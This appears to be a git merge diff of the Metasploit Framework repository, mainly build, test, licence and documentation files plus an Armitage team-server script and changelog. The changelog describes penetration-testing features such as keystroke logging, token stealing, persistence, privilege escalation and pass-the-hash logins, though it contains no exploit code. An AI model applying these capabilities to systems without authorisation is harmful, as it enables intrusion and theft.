Merge branch 'master' of git://github.com/rapid7/metasploit-framework into openpli-shell

.gitignore

@@ -1,4 +1,25 @@
+# Rubymine project directory
+.idea
+# RVM control file
+.rvmrc
+# YARD cache directory
+.yardoc
+# Mac OS X files
+.DS_Store
+# simplecov coverage data
+coverage
 data/meterpreter/ext_server_pivot.dll
 data/meterpreter/ext_server_pivot.x64.dll
+doc/
+external/source/meterpreter/java/bin
+external/source/meterpreter/java/build
+external/source/meterpreter/java/extensions
+external/source/javapayload/bin
+external/source/javapayload/build
+# Packaging directory
+pkg
 tags
 *.swp
+*.orig
+*.rej
+*~

.gitmodules

@@ -1,3 +0,0 @@
-[submodule "lib/msf3"]
-	path = lib/msf3
-	url = git@framework.github.com:rapid7/metasploit-framework.git

.rspec

@@ -0,0 +1,2 @@
+--color
+--format documentation

.simplecov

@@ -0,0 +1,58 @@
+# RM_INFO is set when using Rubymine.  In Rubymine, starting SimpleCov is
+# controlled by running with coverage, so don't explicitly start coverage (and
+# therefore generate a report) when in Rubymine.  This _will_ generate a report
+# whenever `rake spec` is run.
+unless ENV['RM_INFO']
+	SimpleCov.start
+end
+
+SimpleCov.configure do
+  # ignore this file
+	add_filter '.simplecov'
+
+	#
+	# Changed Files in Git Group
+	# @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only
+	#
+
+	untracked = `git ls-files --exclude-standard --others`
+	unstaged = `git diff --name-only`
+	staged = `git diff --name-only --cached`
+	all = untracked + unstaged + staged
+	changed_filenames = all.split("\n")
+
+	add_group 'Changed' do |source_file|
+		changed_filenames.detect { |changed_filename|
+			source_file.filename.end_with?(changed_filename)
+		}
+	end
+
+	#
+	# Framework (msf) related groups
+	#
+
+	add_group 'Metasploit Framework', 'lib/msf'
+	add_group 'Metasploit Framework (Base)', 'lib/msf/base'
+	add_group 'Metasploit Framework (Core)', 'lib/msf/core'
+
+	#
+	# Other library groups
+	#
+
+	add_group 'Fastlib', 'lib/fastlib'
+	add_group 'Metasm', 'lib/metasm'
+	add_group 'PacketFu', 'lib/packetfu'
+	add_group 'Rex', 'lib/rex'
+	add_group 'RKelly', 'lib/rkelly'
+	add_group 'Ruby Mysql', 'lib/rbmysql'
+	add_group 'Ruby Postgres', 'lib/postgres'
+	add_group 'SNMP', 'lib/snmp'
+	add_group 'Zip', 'lib/zip'
+
+	#
+	# Specs are reported on to ensure that all examples are being run and all
+	# lets, befores, afters, etc are being used.
+	#
+
+	add_group 'Specs', 'spec'
+end

.travis.yml

@@ -0,0 +1,14 @@
+language: ruby
+before_install:
+  - sudo apt-get update -qq
+  - sudo apt-get install -qq libpcap-dev
+
+rvm:
+  #- '1.8.7'
+  - '1.9.3'
+
+notifications:
+  irc: "irc.freenode.org#msfnotify"
+
+git:
+  depth: 1

.yardopts

@@ -0,0 +1,7 @@
+--protected
+--exclude samples/
+--exclude \.ut\.rb/
+--exclude \.ts\.rb/
+--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
+lib/msf/**/*.rb
+lib/rex/**/*.rb

CONTRIBUTING.md

@@ -0,0 +1,38 @@
+# Contributing to Metasploit
+
+## Reporting Bugs
+
+If you would like to report a bug, please take a look at [our Redmine
+issue
+tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
+-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
+
+If your bug is new and you'd like to report it you will need to
+[register
+first](https://dev.metasploit.com/redmine/account/register). Don't
+worry, it's easy and fun and takes about 30 seconds.
+
+When you file a bug report, please inclue your **steps to reproduce**,
+full copy-pastes of Ruby stack traces, and any relevant details about
+your environment. Without repro steps, your bug will likely be closed.
+With repro steps, your bugs will likely be fixed.
+
+## Contributing Metasploit Modules
+
+If you have an exploit that you'd like to contribute to the Metasploit
+Framework, please familiarize yourself with the
+**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
+document in the
+Metasploit-Framework repository. There are many mysteries revealed in
+HACKING concerning code style and content.
+
+[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
+should corellate with modules at a 1:1 ratio
+-- there is rarely a good reason to have two, three, or ten modules on
+one pull request, as this dramatically increases the review time
+required to land (commit) any of those modules.
+
+Pull requests tend to be very collaborative for Metasploit -- do not be
+surprised if your pull request to rapid7/metasploit-framework triggers a
+pull request back to your own fork. In this way, we can isolate working
+changes before landing your PR to the Metasploit master branch.

COPYING

@@ -0,0 +1,37 @@
+Copyright (C) 2006-2013, Rapid7 Inc.
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+
+    * Redistributions of source code must retain the above copyright notice,
+	  this list of conditions and the following disclaimer.
+
+    * Redistributions in binary form must reproduce the above copyright notice,
+	  this list of conditions and the following disclaimer in the documentation
+	  and/or other materials provided with the distribution.
+
+    * Neither the name of Rapid7 LLC nor the names of its contributors
+	  may be used to endorse or promote products derived from this software
+	  without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
+ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+================================================================================
+
+The Metasploit Framework is provided under the 3-clause BSD license above.
+
+The copyright on this package is held by Rapid7 LLC.
+
+This license does not apply to several components within the Metasploit
+Framework source tree.  For more details see the LICENSE file.
+

Gemfile

@@ -0,0 +1,40 @@
+source 'http://rubygems.org'
+
+# Need 3+ for ActiveSupport::Concern
+gem 'activesupport', '>= 3.0.0'
+# Needed for Msf::DbManager
+gem 'activerecord'
+# Needed for some admin modules (scrutinizer_add_user.rb)
+gem 'json'
+# Database models shared between framework and Pro.
+gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.6.2'
+# Needed by msfgui and other rpc components
+gem 'msgpack'
+# Needed by anemone crawler
+gem 'nokogiri'
+# Needed for module caching in Mdm::ModuleDetails
+gem 'pg', '>= 0.11'
+# Needed by anemone crawler
+gem 'robots'
+# For sniffer and raw socket modules
+gem 'pcaprub'
+
+group :development do
+  # Markdown formatting for yard
+  gem 'redcarpet'
+  # generating documentation
+  gem 'yard'
+end
+
+group :development, :test do
+  # running documentation generation tasks and rspec tasks
+  gem 'rake'
+end
+
+group :test do
+  # testing framework
+  gem 'rspec', '>= 2.12'
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  gem 'simplecov', '0.5.4', :require => false
+end

Gemfile.lock

@@ -0,0 +1,78 @@
+GIT
+  remote: git://github.com/rapid7/metasploit_data_models.git
+  revision: 67d78f9ce59a74ad9d6e8d3f9e68760ff4d2ec55
+  tag: 0.6.2
+  specs:
+    metasploit_data_models (0.6.2)
+      activerecord (>= 3.2.10)
+      activesupport
+      pg
+      pry
+
+GEM
+  remote: http://rubygems.org/
+  specs:
+    activemodel (3.2.12)
+      activesupport (= 3.2.12)
+      builder (~> 3.0.0)
+    activerecord (3.2.12)
+      activemodel (= 3.2.12)
+      activesupport (= 3.2.12)
+      arel (~> 3.0.2)
+      tzinfo (~> 0.3.29)
+    activesupport (3.2.12)
+      i18n (~> 0.6)
+      multi_json (~> 1.0)
+    arel (3.0.2)
+    builder (3.0.4)
+    coderay (1.0.9)
+    diff-lcs (1.1.3)
+    i18n (0.6.4)
+    json (1.7.7)
+    method_source (0.8.1)
+    msgpack (0.5.2)
+    multi_json (1.0.4)
+    nokogiri (1.5.6)
+    pcaprub (0.11.3)
+    pg (0.14.1)
+    pry (0.9.12)
+      coderay (~> 1.0.5)
+      method_source (~> 0.8)
+      slop (~> 3.4)
+    rake (10.0.2)
+    redcarpet (2.2.2)
+    robots (0.10.1)
+    rspec (2.12.0)
+      rspec-core (~> 2.12.0)
+      rspec-expectations (~> 2.12.0)
+      rspec-mocks (~> 2.12.0)
+    rspec-core (2.12.1)
+    rspec-expectations (2.12.0)
+      diff-lcs (~> 1.1.3)
+    rspec-mocks (2.12.0)
+    simplecov (0.5.4)
+      multi_json (~> 1.0.3)
+      simplecov-html (~> 0.5.3)
+    simplecov-html (0.5.3)
+    slop (3.4.3)
+    tzinfo (0.3.36)
+    yard (0.8.3)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  activerecord
+  activesupport (>= 3.0.0)
+  json
+  metasploit_data_models!
+  msgpack
+  nokogiri
+  pcaprub
+  pg (>= 0.11)
+  rake
+  redcarpet
+  robots
+  rspec (>= 2.12)
+  simplecov (= 0.5.4)
+  yard

HACKING

@@ -31,10 +31,10 @@ interfaces other than msfconsole, such as msfrpc and msfgui, won't see
 your output.  You can use print_line to accomplish the same thing as
 puts. 
 
-2. Don't read from from standard input, doing so will make your code 
+2. Don't read from standard input, doing so will make your code 
 lock up the entire module when called from other interfaces. If you 
 need user input, you can either register an option or expose an 
-interactve session type specific for the type of exploit.
+interactive session type specific for the type of exploit.
 
 3. Don't use "sleep". It has been known to cause issues with
 multi-threaded programs on various platforms. Instead, we use
@@ -48,7 +48,7 @@ the creation of ruby sockets and won't know how to clean them up in
 case your module raises an exception without cleaning up after itself.
 Secondly, non-Rex sockets do not know about routes and therefore can't
 be used through a meterpreter tunnel.  Lastly, regular sockets miss
-out on msf's proxy and ssl features.  Msf includes many protocols
+out on msf's proxy and SSL features.  Msf includes many protocols
 already implemented with Rex and if the protocol you need is missing,
 porting another library to use them is straight-forward.  See our
 Net::SSH modifications in lib/net/ssh/ for an example.
@@ -112,13 +112,19 @@ Submitting Your Code
 
 The process for submitting new modules via GitHub is documented here:
 
-https://github.com/rapid7/metasploit-framework/wiki/Working-with-the-Framework-Repo
+https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
 
 This describes the process of forking, editing, and generating a
 pull request, and is the preferred method for bringing new modules
 and framework enhancements to the attention of the core Metasploit
 development team. Note that this process requires a GitHub account.
 
+For Git commits, please adhere to 50/72 formatting: your commits should
+start with a line 50 characters or less, followed by a blank line,
+followed by one or more lines of explanatory text wrapped at at 72
+characters Pull requests with commits not formatted this way will
+be rejected without review.
+
 For modules, note that Author field is not automatic, and should be 
 filled in in the format of 'Your Name <user[at]domain.tld>' so future 
 developers can contact you with any questions.

README

@@ -1,70 +0,0 @@
-Copyright (C) 2006-2011, Rapid7 LLC
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
-    * Redistributions of source code must retain the above copyright notice,
-	  this list of conditions and the following disclaimer.
-
-    * Redistributions in binary form must reproduce the above copyright notice,
-	  this list of conditions and the following disclaimer in the documentation
-	  and/or other materials provided with the distribution.
-
-    * Neither the name of Rapid7 LLC nor the names of its contributors
-	  may be used to endorse or promote products derived from this software
-	  without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
-ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
-ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-================================================================================
-
-The Metasploit Framework is provided under the 3-clause BSD license above.
-
-The copyright on this package is held by Rapid7 LLC.
-
-
-This license does not apply to the following components:
- - The Bit-Struct library located under lib/bit-struct
- - The OpenSSL library embedded into the Meterpreter payload binaries and the
-   corresponding header files in the source tree
- - The Packet Sniffer SDK (MicroOLAP) library embedded into the Meterpreter
-   Sniffer extension. HD Moore has a single-seat developer license.
- - The modified TightVNC binaries and their associated source code.
- - The Byakugan plugin located under external/source/byakugan
- - The Metasm library located under lib/metasm
- - The PcapRub library located under external/pcaprub
- - The Rabal library located under lib/rabal
- - The PacketFu library located under lib/packetfu
- - The Ruby-Lorcon library located under external/ruby-lorcon
- - The SNMP library located under lib/snmp
- - The Zip library located under lib/zip
- - The SSHKey library located under lib/sshkey
-
-The latest version of this software is available from http://metasploit.com/
-
-Bug tracking and development information can be found at:
- https://dev.metasploit.com/redmine/projects/framework/
-
-The public GitHub source repository can be found at:
- https://github.com/rapid7/metasploit-framework
-
-Questions and suggestions can be sent to:
- msfdev[at]metasploit.com
-
-The framework mailing list is the place to discuss features and ask for help.
-To subscribe, visit the following web page:
- https://mail.metasploit.com/mailman/listinfo/framework
-
-The archives are available from:
- https://mail.metasploit.com/pipermail/framework/
-

README.md

@@ -0,0 +1,55 @@
+
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
+==
+The Metasploit Framework is released under a BSD-style license. See
+COPYING for more details.
+
+The latest version of this software is available from http://metasploit.com/
+
+Bug tracking and development information can be found at:
+ https://dev.metasploit.com/redmine/projects/framework/
+
+The public GitHub source repository can be found at:
+ https://github.com/rapid7/metasploit-framework
+
+Questions and suggestions can be sent to:
+ msfdev(at)metasploit.com
+
+The framework mailing list is the place to discuss features and ask for help.
+To subscribe, visit the following web page:
+ https://mail.metasploit.com/mailman/listinfo/framework
+
+The mailing list archives are available from:
+ https://mail.metasploit.com/pipermail/framework/
+
+Installing
+--
+Generally, you should use the installer which contains all dependencies
+and will get you up and running with a few clicks. See the [Dev
+Environment Setup][wiki-devenv] if you'd like to deal with dependencies
+on your own.
+
+Using Metasploit
+--
+Metasploit can do all sorts of things. The first thing you'll want to do
+is start `msfconsole`, but after that, you'll probably be best served by
+reading some of the great tutorials online:
+
+  * [Metasploit Unleashed][unleashed]
+  * [The official Metasploit wiki on Github][wiki-start]
+
+Contributing
+--
+See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
+walk you through the whole process starting from installing all the
+dependencies, to cloning the repository, and finally to submitting a
+pull request. For slightly more info, see
+[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+
+
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"
+[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
+[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+
+

Rakefile

@@ -0,0 +1,49 @@
+require 'bundler/setup'
+
+require 'metasploit_data_models'
+
+print_without = false
+
+begin
+	require 'rspec/core/rake_task'
+rescue LoadError
+	puts "rspec not in bundle, so can't set up spec tasks.  " \
+	     "To run specs ensure to install the development and test groups."
+
+	print_without = true
+else
+	RSpec::Core::RakeTask.new(:spec)
+
+	task :default => :spec
+end
+
+begin
+  require 'yard'
+rescue LoadError
+	puts "yard not in bundle, so can't set up yard tasks.  " \
+	     "To generate documentation ensure to install the development group."
+
+	print_without = true
+end
+
+metasploit_data_models_task_glob = MetasploitDataModels.root.join(
+		'lib',
+		'tasks',
+		'**',
+		'*.rake'
+).to_s
+
+# include tasks from metasplioit_data_models, such as `rake yard`.
+# metasploit-framework specific yard options are in .yardopts
+Dir.glob(metasploit_data_models_task_glob) do |path|
+	load path
+end
+
+if print_without
+	puts "Bundle currently installed " \
+	     "'--without #{Bundler.settings.without.join(' ')}'."
+	puts "To clear the without option do `bundle install --without ''` " \
+	     "(the --without flag with an empty string) or " \
+	     "`rm -rf .bundle` to remove the .bundle/config manually and " \
+	     "then `bundle install`"
+end

data/armitage/readme.txt

@@ -32,9 +32,6 @@ information on connecting Armitage to Metasploit and using it.
 
 To get started, see the manual at http://www.fastandeasyhacking.com
 
-To update Armitage, type 'svn update .' to get the latest archive from the
-subversion server. I recommend doing this regularly (once a week). 
-
 4. Source Code
    -----------
 
@@ -63,7 +60,7 @@ sure you peruse the FAQ and Manual first.
 7. License
    -------
 
-(c) 2010-2011 Raphael Mudge. This project is licensed under the BSD license. 
+(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license. 
 See section 8 for more information.
 
 lib/jgraphx.jar is used here within the terms of the BSD license offered by

data/armitage/teamserver

@@ -0,0 +1,72 @@
+#!/bin/bash
+# start msfrpcd and the deconfliction server. Check for common mistakes
+# to save some time and head scratching...
+
+# check the arguments
+EXPECTED=2
+if [ $# -ne $EXPECTED ]; then
+	echo "[-] You must provide: <external IP address> <team password>"
+	echo "    <external IP address> must be reachable by Armitage"
+	echo "          clients on port 55553"
+	echo "    <team password> is a shared password your team uses to"
+	echo "          authenticate to the Armitage team server"
+	exit
+fi
+
+# check that we're r00t
+if [ $UID -ne 0 ]; then
+	echo "[-] Superuser privileges are required to run the team server"
+	exit 
+fi
+
+# check if java is available...
+if [ $(command -v java) ]; then
+	true
+else
+	echo "[-] java is not in \$PATH"
+	echo "    is Java installed?"
+	exit
+fi
+
+# check if keytool is available...
+if [ $(command -v keytool) ]; then
+	true
+else
+	echo "[-] keytool is not in \$PATH"
+	echo "    install the Java Developer Kit"
+	exit
+fi
+
+# check if msfrpcd is available
+if [ $(command -v msfrpcd) ]; then
+	true
+else
+	echo "[-] msfrpcd is not in \$PATH"
+	echo "    is Metasploit installed?"
+	exit
+fi
+
+# check if msfrpcd is running or not
+if [ "$(pidof msfrpcd)" ]; then
+	echo "[-] msfrpcd is already running. Kill it before running this script"
+	echo "    try: killall -9 msfrpcd"
+	exit
+fi
+
+# generate a certificate
+	# naturally you're welcome to replace this step with your own permanent certificate.
+	# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
+	# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
+	# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
+	# is printed so users may have a chance to verify they're not being owned.
+echo "[+] Generating X509 certificate and keystore (for SSL)"
+rm -f ./armitage.store
+keytool -keystore ./armitage.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias armitage -dname "CN=Armitage Hacker, OU=FastAndEasyHacking, O=Armitage, L=Somewhere, S=Cyberspace, C=Earth"
+
+# start everything up
+echo "[+] Starting RPC daemon"
+msfrpcd -U msf -P $2 -a 127.0.0.1 -p 55554 -S
+echo "[+] sleeping for 20s (to let msfrpcd initialize)"
+sleep 20
+echo "[+] Starting Armitage team server"
+java -Djavax.net.ssl.keyStore=./armitage.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+UseParallelGC -jar armitage.jar --server $1 55554 msf $2 55553

data/armitage/whatsnew.txt

@@ -1,6 +1,542 @@
 Armitage Changelog
 ==================
 
+6 Mar 13 (tested against msf ca43900a7)
+--------
+- Active console now gets higher priority when polling msf for output
+- Improved team server responsiveness in high latency situations by 
+  creating additional connections to server to balance messages over
+- Preferences are now shared among each Armitage connection.
+
+6 Mar 13 (2000h)
+--------
+- Fixed issue with additional team server connections reporting wrong
+  application and receiving a summary rejection by the team server.
+
+Cortana Updates (for scripters)
+--------
+- Added a &publish, &query, &subscribe API to allow inter-script 
+  communication across the team server.
+- Added &table_update to set the contents of a table tab without 
+  disturbing the highlighted rows.
+- Added an exec_error event. Fired when &m_exec or &m_exec_local fail
+  due to an error reported by meterpreter.
+- Fixed a bug that sometimes caused session_sync to fire twice (boo!)
+- Added a 60s timeout to &s_cmd commands. Cortana will give a shell
+  command 60s to execute. If it doesn't finish in that time, Cortana
+  will release the lock on the shell so the user can control it.
+  (ideally, this shouldn't happen... this is a safety mechanism)
+- Changed Meterpreter command timeout to 2m from 12s. This is because
+  https meterpreter might not checkin for up to 60s, if it's been
+  idle for a long time. This will make &m_cmd less likely to timeout
+
+12 Feb 13 (tested against msf 16438)
+---------
+- Fixed a corner case preventing the display of removed host labels 
+  when connected to a team server.
+- Fixed RPC call cache corruption in team server mode. This bug could 
+  lead to some exploits defaulting to a shell payload when meterpreter 
+  was a possibility.
+- Slight optimization to some DB queries. I no longer pull unused
+  fields making the query marginally faster. Team server is more
+  efficient too as changes to unused fields won't force data (re)sync.
+- Hosts -> Clear Database now clears host labels too.
+- Added the ability to manage multiple team server instances through
+  Armitage. Go to Armitage -> New Connection to connect to another
+  server. A button bar will appear that allows you to switch active
+  Armitage connections.
+	- Credentials available across instances are pooled when using
+ 	  the [host] -> Login menu and the credential helper.
+- Rewrote the event log management code in the team server
+- Added nickname tab completion to event log. I feel like I'm writing
+  an IRC client again.
+- Hosts -> Clear Database now asks you to confirm the action.
+- Hosts -> Import Hosts announces successful import to event log again.
+
+23 Jan 13 (tested against msf 16351)
+---------
+- Added helpers to set EXE::Custom and EXE::Template options.
+- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
+- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
+  check if a proxy server is up was deadlock prone. Removed it.
+- Starting SOCKS Proxy module now opens a tab displaying the module
+  start process. An event is posted to the event log too.
+- Created an option helper to select credentials for SMBUser, SMBPass, 
+  USERNAME, and PASSWORD. 
+- Added a feature to label hosts. A label will show up in its own column
+  in table view or below all info in graph view. Any team member may
+  change a label through [host] -> host -> Set Label. You may also use
+  dynamic workspaces to show hosts with certain labels attached.
+- Fixed bad things happening when connecting Armitage to 'localhost' and
+  not '127.0.0.1'.
+- Screenshots and Webcam shots are now centered in their tab.
+- Added an alternate .bat file to start msfrpcd on Windows in the
+  Metasploit 4.5 installer's environment.
+- Added a color-style for [!] warning messages
+
+Cortana Updates (for scripters)
+--------
+- &handler function now works as advertised.
+- Cortana now avoids use of core.setg
+
+4 Jan 13 (tested against msf 16252)
+--------
+- Added a helper to set REXE option
+- Added an icon to represent Windows 8
+- [host] -> Login menu is now built using open services for all 
+  highlighted hosts, not just the first one.
+- [host] -> Login items now escape punctuation characters in passwords
+  before passing them to a framework module.
+- Added the windows and linux postgres_payload exploits to the use a
+  reverse payload by default list.
+- Small tweak to allow Armitage to work with Metasploit 4.5 installed
+  environment on Windows.
+
+Cortana Updates (for scripters)
+--------
+- &credential_add and &credential_delete no longer break when a 
+  password has creative punctuation in it.
+
+26 Nov 12 (tested against msf 16114)
+---------
+- Windows command shell tab is now friendlier to commands that prompt
+  for input (e.g., time command)
+- [host] -> Meterpreter -> Access -> Escalate Privileges now shows all
+  the framework's new exploit/windows/local modules too
+- [host] -> Shell -> Post Modules now shows the framework's unix/local 
+  and exploit/linux/local modules
+- Added Ctrl+I shortcut. Lets you choose a session to interact with.
+- Added Steal Token button to Processes dialog.
+- Armitage now asks Metasploit for a non-expiring authentication token.
+  This will prevent Armitage from losing its access to msfrpcd when you
+  put your computer to sleep or pause the VM running Metasploit.
+- add_user and add_[local]group_user now show all of their output when
+  the -h flag is used to operate on a remote host.
+- added a Delete menu to creds table. Right-click a cred to delete it
+
+Cortana Updates (for scripters)
+--------
+- aliased &data_delete to &data_clear to match the documentation.
+- &file_get, &loot_get, and &file_content no longer delete the remote 
+  file when connected to a teamserver.
+
+16 Oct 12 (tested against msf 15972)
+---------
+- Added port 5985 to MSF Scans list.
+- Meterpreter -> Access -> Persistence sets ACTION option for you
+- Changed how LHOST and LPORT are set globally to prevent Ruby 
+  character encoding conversion error in the framework.
+- Pass Session, Log Keystrokes, and Persist now query module info
+  in a separate thread (avoids a deadlock opportunity)
+- Armitage now shows folder/URL in a popup dialog for environments
+  where JDesktop API to open them directly is not supported
+- Check all credentials option now filters the list to avoid trying
+  a pair of credentials twice.
+- Armitage's exploit payload selection now selects cmd/unix/interact
+  when appropriate.
+- Explore -> Processes now works with Java Meterpreter again.
+- MSF Scans feature now runs http_version against port 443
+
+5 Sept 12 (tested against msf r15804)
+---------
+- Setup dialog now trims host, port, user, and pass fields.
+- Armitage now complains when it can't write to your preferences
+  file (versus just hanging without a real error message)
+- View -> Jobs now queries jobs in a thread outside of UI thread
+- Tab completion now uses a separate thread to call into the RPC
+  server. This prevents a deadlock if server is not responding.
+- Login -> psexec now shows when 445 is open on a Windows machine.
+  The old criteria was too restrictive.
+- Added a helper to set Wordlist option
+- Armitage now sets a random LPORT for non-exploit modules with an
+  LPORT option (e.g., post modules that do priv escalation)
+- Armitage now shows an error if it can't open a Win command shell
+- Steal Token dialog now uses incognito module to get token data 
+  instead of the MSF post module. This is more reliable.
+- You may now setup the reverse payload for current_user_psexec
+
+Cortana Updates (for scripters)
+--------
+- added an eventlog popup hook
+
+16 Aug 12 (tested against msf r15753)
+----------
+- Dynamic workspaces now removes closed services from its set of
+  hosts matching certain open ports.
+- Cortana console now reports a clear error message a built-in
+  command is executed without the right number of arguments.
+- Added host icons for Android and iOS. You may now set these
+  operating systems by going to [host] -> Host -> Operating System
+- Armitage now shows the client-side exploit dialog for any exploit
+  that does not target an RHOST (for example, windows/smb/smb_relay)
+- Added support for remote exploits that use RHOSTS over RHOST
+  (this includes the new windows/local/current_user_psexec)
+- Added a helper for setting the SESSION option
+
+Cortana Updates (for scripters)
+--------
+- s_cmd no longer times out after 60s. It will wait forever for
+  a command to complete now.
+- added shell_read event which fires when a shell s_cmd comes
+  back with intermediate output.
+- fixed a potential deadlock with &open_console_tab
+- scripts now have the ability to redefine the max size of a 
+  workspace: db_workspace(%(size => #####));
+
+2 Aug 12 (tested again msf r15698)
+--------
+- Armitage now reports vulnerability module and descriptions 
+  properly (again) when exporting data. Had to update to match a
+  change to the db schema.
+- Pass-the-Hash and Login dialogs now stay open if you press 
+  shift while clicking Launch. This convention is pretty universal
+  to Armitage.
+- Team server now buffers all of its outgoing data. I've also 
+  disabled SO_NODELAY. This will greatly improve team server latency
+  on congested networks without impacting responsiveness otherwise.
+- Added Cortana, a DARPA funded scripting technology, into Armitage.
+  There's a lot of fun to be had here.
+- Armitage now queues messages to destroy a console rather than
+  spinning up a new thread for each closed console.
+- Rendering of icons for hosts now happens outside of UI thread.
+- Increased timeout for meterpreter read command
+- Armitage now detects a corrupt module cache and attempts to clear
+  it so it can be rebuilt. 
+
+5 Jul 12
+--------
+- Login -> psexec now sets a different LPORT for each host it's
+  launched against when using a reverse payload. Fixes a bug where
+  using a reverse connect payload against X hosts didn't work.
+- Progressbar Cancel button now works with the Sync Files button
+  in View -> Downloads and View -> Loot
+- Fixed a potential deadlock with the Sync Files feature
+- Clicking the Size column in View -> Downloads now sorts properly
+
+24 Jun 12
+---------
+- Meterpreter -> Kill now uses session.stop RPC call
+- Simplified code to stop a running job
+- Added an option to disable TCP_NODELAY from the comamnd line:
+
+	java -Darmitage.enable_nagle=true -jar armitage.jar
+
+  Use this if you see "bad mac" SSL errors when connected to a
+  team server.
+- Log Keystrokes tab now changes color when there is activity
+- Randomized filename for USERPASS_FILE to allow multiple brute
+  forces to happen at once.
+- Added a View item in the File Browser's popup menu. This will
+  let you quickly read several highlighted text files (it also
+  saves the files to the right place locally too)
+
+7 Jun 12 - Adding on to those quick bug fixes / tweaks
+--------
+- Disabled Nagles algorithm for team server and client SSL sockets.
+  This makes team server much more responsive... trust me.
+- Fixed bug preventing Armitage from showing "Started Service" 
+  message when starting the SOCKS Proxy server.
+- Fixed a find feature highlight bug in the View tab.
+
+30 May 12 - A few quick bug fixes / tweaks...
+---------
+- Fixed an exception when killing a session or removing a route 
+  through the UI. 
+- Oooh, ps command added a new column to its output. Updated ps  
+  parser to handle this.
+- Hosts -> Import Hosts now works under Windows again. Had to 
+  escape the filename. *sigh*
+- Hail Mary now sets LHOST option. This is necessary for some 
+  attacks to work properly.
+- Tweaked console create code in beginning of Armitage setup to 
+  hopefully avoid aggravating the evil console.create deadlock
+  condition.
+
+21 May 12
+---------
+- Added a hack to prevent the input area from flickering when the 
+  prompt changes.
+- Updated the color palette to something a little more subtle.
+- Added an optimization to how modules are launched. This will make
+  a difference for team use in high latency situations.
+- Rewrote MSF Scans feature to use console queue. This option is more
+  reliable and it makes the code easier to follow.
+- Added a hack to combine chat message writes with a read request.
+  This will make the event log more responsive in a high latency 
+  situation (can't you tell I care about this "situation")
+- Fixed text highlights through Ctrl+F on Windows. UNIX platforms 
+  were always OK. Another good reason to not use these tools on 
+  Windows. Ever.
+- View -> Downloads Sync Files feature now works on Windows. It looks
+  like leaving those pesky :'s in the file paths is bad.
+
+17 May 12
+---------
+- Fixed bug with loot/download viewer breaking with a font resize.
+- Default console font color is now grey. I never noticed that I had
+  white text on a black background before. That's a lot of contrast.
+  This is adjustable too through Armitage -> Preferences.
